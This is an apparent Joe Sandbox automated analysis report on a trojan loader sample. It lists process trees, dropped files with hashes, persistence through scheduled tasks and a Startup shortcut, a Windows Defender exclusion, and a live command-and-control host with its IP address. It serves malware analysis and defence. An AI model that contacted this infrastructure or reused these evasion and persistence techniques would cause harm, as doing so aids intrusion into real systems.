                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1476041 Sample: SecuriteInfo.com.TrojanLoad... Startdate: 18/07/2024 Architecture: WINDOWS Score: 100 51 moneymaker-30608.portmap.host 2->51 57 Snort IDS alert for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 18 other signatures 2->63 8 SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe 7 2->8         started        12 xNgpESfQOvfb.exe 5 2->12         started        signatures3 process4 file5 41 C:\Users\user\AppData\...\xNgpESfQOvfb.exe, PE32 8->41 dropped 43 C:\Users\...\xNgpESfQOvfb.exe:Zone.Identifier, ASCII 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmpA395.tmp, XML 8->45 dropped 47 SecuriteInfo.com.T....29424.1974.exe.log, ASCII 8->47 dropped 65 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 8->67 69 Adds a directory exclusion to Windows Defender 8->69 14 SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe 6 8->14         started        18 powershell.exe 23 8->18         started        21 powershell.exe 23 8->21         started        23 schtasks.exe 1 8->23         started        71 Multi AV Scanner detection for dropped file 12->71 73 Machine Learning detection for dropped file 12->73 75 Injects a PE file into a foreign processes 12->75 25 schtasks.exe 12->25         started        27 xNgpESfQOvfb.exe 12->27         started        29 xNgpESfQOvfb.exe 12->29         started        signatures6 process7 dnsIp8 53 moneymaker-30608.portmap.host 193.161.193.99, 30608, 49717 BITREE-ASRU Russian Federation 14->53 49 C:\Users\user\AppData\Roaming\XClient.exe, PE32 14->49 dropped 55 Loading BitLocker PowerShell Module 18->55 31 conhost.exe 18->31         started        33 WmiPrvSE.exe 18->33         started        35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        39 conhost.exe 25->39         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe32%ReversingLabs
                    SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\XClient.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\XClient.exe32%ReversingLabs
                    C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe32%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    moneymaker-30608.portmap.host100%Avira URL Cloudphishing

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    moneymaker-30608.portmap.host
                    		193.161.193.99
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      moneymaker-30608.portmap.hosttrue
                      • Avira URL Cloud: phishing
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, xNgpESfQOvfb.exe, 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      193.161.193.99
                      		moneymaker-30608.portmap.hostRussian Federation
                      		198134BITREE-ASRUtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1476041
                      Start date and time:2024-07-18 16:28:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 13s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@21/18@1/1
                      EGA Information:
                      • Successful, ratio: 75%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 204
                      • Number of non-executed functions: 11
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target xNgpESfQOvfb.exe, PID 380 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      10:29:03API Interceptor9388041x Sleep call for process: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe modified
                      10:29:07API Interceptor35x Sleep call for process: powershell.exe modified
                      10:29:09API Interceptor30x Sleep call for process: xNgpESfQOvfb.exe modified
                      16:29:08Task SchedulerRun new task: xNgpESfQOvfb path: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      16:29:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      193.161.193.99Yq5Gp2g2vB.exeGet hashmaliciousRedLineBrowse
                      • okmaq-24505.portmap.host:24505/
                      JnBNepHH7K.exeGet hashmaliciousAsyncRAT RedLineBrowse
                      • exara32-64703.portmap.host:64703/
                      99SKW728vf.exeGet hashmaliciousRedLineBrowse
                      • lottie9nwtina-55339.portmap.host:55339/
                      amazoninvoiceAF0388d83739dee83479171dbcf.exeGet hashmaliciousRedLineBrowse
                      • tete2792-22120.portmap.host:22120//

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      moneymaker-30608.portmap.hostSecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                      • 193.161.193.99
                      SecuriteInfo.com.Win32.RATX-gen.31110.7671.exeGet hashmaliciousXWormBrowse
                      • 193.161.193.99
                      SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exeGet hashmaliciousXWormBrowse
                      • 193.161.193.99

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      BITREE-ASRUSecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                      • 193.161.193.99
                      SecuriteInfo.com.Win32.RATX-gen.31110.7671.exeGet hashmaliciousXWormBrowse
                      • 193.161.193.99
                      SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exeGet hashmaliciousXWormBrowse
                      • 193.161.193.99
                      0aXmWlKxOj.exeGet hashmaliciousXWormBrowse
                      • 193.161.193.99
                      DriverUpdt.exeGet hashmaliciousXWormBrowse
                      • 193.161.193.99
                      password.exeGet hashmaliciousSugarDump, XWormBrowse
                      • 193.161.193.99
                      Project Al Ain (Hilli & Al Fou#U2019ah) Parks.vbeGet hashmaliciousStormKitty, XWormBrowse
                      • 193.161.193.99
                      9Ok3QP5FFV.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 193.161.193.99
                      Client.exeGet hashmaliciousQuasarBrowse
                      • 193.161.193.99
                      siuu.exeGet hashmaliciousXWormBrowse
                      • 193.161.193.99

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1415
                      Entropy (8bit):5.352427679901606
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                      MD5:97AD91F1C1F572C945DA12233082171D
                      SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                      SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                      SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                      Malicious:true
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xNgpESfQOvfb.exe.log

                      Download File
                      Process:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1415
                      Entropy (8bit):5.352427679901606
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                      MD5:97AD91F1C1F572C945DA12233082171D
                      SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                      SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                      SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):2232
                      Entropy (8bit):5.379401388151058
                      Encrypted:false
                      SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZeUyus:fLHxvIIwLgZ2KRHWLOugos
                      MD5:8B31787758671196183789E550CE0BD7
                      SHA1:E42CBA6033293DB707F88FEFA1362042DD8896C1
                      SHA-256:4667F2971C25BE1476BD553E43FDB7E452768B17670044A4DB1B432C7B8C96AB
                      SHA-512:74169910DC0EDDA75ECDCFC6AFF2842692F6EFB165935AD6CD849899D373C41A6628D6C6679ADBD89BEF8F73110BF01F14C3FEDBC7C1493A00A6EE159BD76621
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\Log.tmp

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):29
                      Entropy (8bit):3.598349098128234
                      Encrypted:false
                      SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                      MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                      SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                      SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                      SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                      Malicious:false
                      Preview:....### explorer ###..[WIN]r

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gfdxyox.cwz.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ay0km4r1.gv4.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3gy1pex.vwy.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nprvw5ue.ued.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_peon5yz0.ez2.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tu5noxum.si2.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbnrrdtg.x1z.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zt3jks1q.2x5.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\tmp9832.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1599
                      Entropy (8bit):5.099004056519076
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL24xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTaYv
                      MD5:00D3C36BF0ED208575B2A877DDB1A2FD
                      SHA1:203F0ED5A50927FE1E48CBBB434D3D092C112EC3
                      SHA-256:F0A808B66E8826EE981AAB2833D829736673C728EAC692812A20015847490B75
                      SHA-512:60FEE7236A7ECD8B58F4303D51A7112B67512337BA2232EF71164846F88440F2F73E83A12F404161E0167E4AE0C3BAED048FFB19D9FDA258ED866B84797315EF
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                      C:\Users\user\AppData\Local\Temp\tmpA395.tmp

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1599
                      Entropy (8bit):5.099004056519076
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL24xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTaYv
                      MD5:00D3C36BF0ED208575B2A877DDB1A2FD
                      SHA1:203F0ED5A50927FE1E48CBBB434D3D092C112EC3
                      SHA-256:F0A808B66E8826EE981AAB2833D829736673C728EAC692812A20015847490B75
                      SHA-512:60FEE7236A7ECD8B58F4303D51A7112B67512337BA2232EF71164846F88440F2F73E83A12F404161E0167E4AE0C3BAED048FFB19D9FDA258ED866B84797315EF
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 18 13:29:12 2024, mtime=Thu Jul 18 13:29:12 2024, atime=Thu Jul 18 13:29:12 2024, length=641536, window=hide
                      Category:dropped
                      Size (bytes):767
                      Entropy (8bit):5.062405013006843
                      Encrypted:false
                      SSDEEP:12:82TyE24Ts4pnu8ChZ1AlXIsY//AttajLLRyejAhG+HkPhUGmV:82Ty+TtD21AlXUo4LR/AhGFZhm
                      MD5:A54D89C82B2CAC873043C7EC8CA6FAFC
                      SHA1:47D0066028824907FFACD5B742DD48610D661499
                      SHA-256:0A570FC5F0AE0E44DFF5A200FEFE342D22859AC2354F7234E9AA6FCDC094C0B0
                      SHA-512:4357489531A2AD95830F6A399A621287AAACDAF3BE113C1F80664BA2D953DC3F9CC9605BF459E1C886E0A3FF3DB0EA866BE87D965784AC0F894430C37F952985
                      Malicious:false
                      Preview:L..................F.... ...................................................v.:..DG..Yr?.D..U..k0.&...&.......$..S...?.=......X..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.s...........................^.A.p.p.D.a.t.a...B.V.1......X.s..Roaming.@......EW<2.X.s..../......................U..R.o.a.m.i.n.g.....b.2......X.s .XClient.exe.H.......X.s.X.s..........................y...X.C.l.i.e.n.t...e.x.e.......\...............-.......[............E.......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......045012...........hT..CrF.f4... .M...Jc...-...-$..hT..CrF.f4... .M...Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                      C:\Users\user\AppData\Roaming\XClient.exe

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):641536
                      Entropy (8bit):7.707880699127507
                      Encrypted:false
